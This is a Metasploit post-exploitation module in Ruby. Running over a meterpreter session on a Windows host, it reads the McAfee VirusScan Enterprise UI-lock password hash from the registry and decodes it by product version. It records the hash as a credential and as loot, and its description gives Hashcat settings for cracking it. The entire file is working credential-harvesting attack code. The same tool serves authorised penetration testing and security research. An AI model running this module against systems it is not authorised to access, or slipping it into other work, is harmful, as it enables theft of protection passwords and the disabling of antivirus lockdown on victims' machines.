##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
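class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles

  # Product version boundaries that decide how the UIPEx registry value is
  # encoded and which John the Ripper format label is attached to it.
  VERSION_5 = Rex::Version.new('5.0')
  VERSION_6 = Rex::Version.new('6.0')
  VERSION_8 = Rex::Version.new('8.0')
  VERSION_9 = Rex::Version.new('9.0')

  # Registry keys under which VSE keeps its DesktopProtection settings; the
  # Wow6432Node path is checked first so the 64-bit case is covered.
  VSE_REGISTRY_KEYS = [
    'HKLM\\Software\\Wow6432Node\\McAfee\\DesktopProtection', # 64-bit
    'HKLM\\Software\\McAfee\\DesktopProtection' # 32-bit
  ].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'McAfee Virus Scan Enterprise Password Hashes Dump',
        'Description' => %q{
          This module extracts the password hash from McAfee Virus Scan Enterprise (VSE)
          used to lock down the user interface. Hashcat supports cracking this type of
          hash using hash type sha1($salt.unicode($pass)) (-m 140) and a hex salt
          (--hex-salt) of 01000f000d003300 (unicode "\x01\x0f\x0d\x33"). A dynamic
          format is available for John the Ripper at the referenced URL.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Mike Manzotti <mike.manzotti[at]dionach.com>', # Metasploit module
          'Maurizio inode Agazzini' # original research
        ],
        'References' => [
          ['URL', 'https://www.dionach.com/blog/disabling-mcafee-on-access-scanning']
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Entry point: find VSE installations in the registry, pull the UI-lock
  # password hash out of each one, and record the results as credentials and
  # loot. Stops early (verbose message only) when nothing is found.
  def run
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
    print_status("Looking for McAfee VSE password hashes on #{hostname} (#{session.session_host}) ...")

    vse_keys = enum_vse_keys
    if vse_keys.empty?
      vprint_error('McAfee VSE not installed or insufficient permissions')
      return
    end

    hashes_and_versions = extract_hashes_and_versions(vse_keys)
    if hashes_and_versions.empty?
      vprint_error('No McAfee VSE hashes extracted')
      return
    end
    process_hashes_and_versions(hashes_and_versions)
  end

  # Returns the DesktopProtection keys that can be opened on the target.
  #
  # A nil result from registry_enumkeys (key absent, or not readable with the
  # session's privileges) drops the candidate; an existing key with no
  # subkeys still counts, because the values we need live directly on it.
  #
  # @return [Array<String>] registry key paths, in VSE_REGISTRY_KEYS order
  def enum_vse_keys
    vprint_status('Enumerating McAfee VSE installations')
    VSE_REGISTRY_KEYS.reject { |key| registry_enumkeys(key).nil? }
  end

  # Reads the UIPEx (password hash) and szProductVer values from each key.
  #
  # @param keys [Array<String>] registry keys returned by enum_vse_keys
  # @return [Hash{String => Rex::Version}] raw UIPEx value => product version.
  #   Keying on the hash value collapses duplicates, e.g. when both registry
  #   paths resolve to the same installation.
  def extract_hashes_and_versions(keys)
    vprint_status("Attempting to extract hashes from #{keys.size} McAfee VSE installations")
    hash_map = {}
    keys.each do |key|
      # registry_getvaldata may hand back nil (rather than '') when the value
      # is missing, so test for nil before empty? or a single install without
      # a UI password raises NoMethodError and aborts the whole module.
      hash = registry_getvaldata(key, 'UIPEx')
      if hash.nil? || hash.empty?
        vprint_error("No McAfee VSE password hash found in #{key}")
        next
      end

      version = registry_getvaldata(key, 'szProductVer')
      if version.nil? || version.empty?
        vprint_error("No McAfee VSE version key found in #{key}")
        next
      end

      begin
        hash_map[hash] = Rex::Version.new(version)
      rescue ArgumentError
        # Rex::Version (built on Gem::Version) rejects malformed version
        # strings; skip this install instead of letting the module die.
        vprint_error("Unparseable McAfee VSE version '#{version}' in #{key}")
      end
    end
    hash_map
  end

  # Classifies each hash by product version, prints it, and records it both
  # as a non-replayable credential (it can only be cracked, not reused as-is)
  # and as a loot file.
  #
  # @param hashes_and_versions [Hash{String => Rex::Version}] output of
  #   extract_hashes_and_versions
  def process_hashes_and_versions(hashes_and_versions)
    hashes_and_versions.each do |raw_hash, version|
      hashtype, version_name, hash = classify_vse_hash(raw_hash, version)

      print_good("McAfee VSE #{version_name} (#{hashtype}) password hash: #{hash}")

      credential_data = {
        post_reference_name: refname,
        origin_type: :session,
        private_type: :nonreplayable_hash,
        private_data: hash,
        session_id: session_db_id,
        jtr_format: hashtype,
        workspace_id: myworkspace_id
      }

      create_credential(credential_data)

      # Store McAfee password hash as loot
      loot_path = store_loot('mcafee.hash', 'text/plain', session, "mcafee:#{hash}", 'mcafee_hashdump.txt', 'McAfee Password Hash')
      print_good("McAfee VSE password hash saved in: #{loot_path}")
    end
  end

  # Maps a raw UIPEx value and product version to
  # [jtr_format, version label, hash string in the form the cracker expects].
  #
  # 5.x stores the hash as-is (John 'md5u'). Later releases base64-encode it,
  # so the decoded bytes are emitted as hex for John's dynamic_1405 (and the
  # hashcat -m 140 recipe in the module description). Anything outside 5.x and
  # 8.x is still handled as v8, with a warning so the operator can double-check.
  #
  # @param raw_hash [String] UIPEx registry value
  # @param version [Rex::Version] szProductVer of the same installation
  # @return [Array(String, String, String)]
  def classify_vse_hash(raw_hash, version)
    return ['md5u', 'v5', raw_hash] if version >= VERSION_5 && version < VERSION_6

    unless version >= VERSION_8 && version < VERSION_9
      print_warning("Unknown McAfee VSE version #{version} - Assuming v8")
    end
    # Base64 decode hash, then present it as a hex string
    ['dynamic_1405', 'v8', Rex::Text.to_hex(Rex::Text.decode_base64(raw_hash), '')]
  end
end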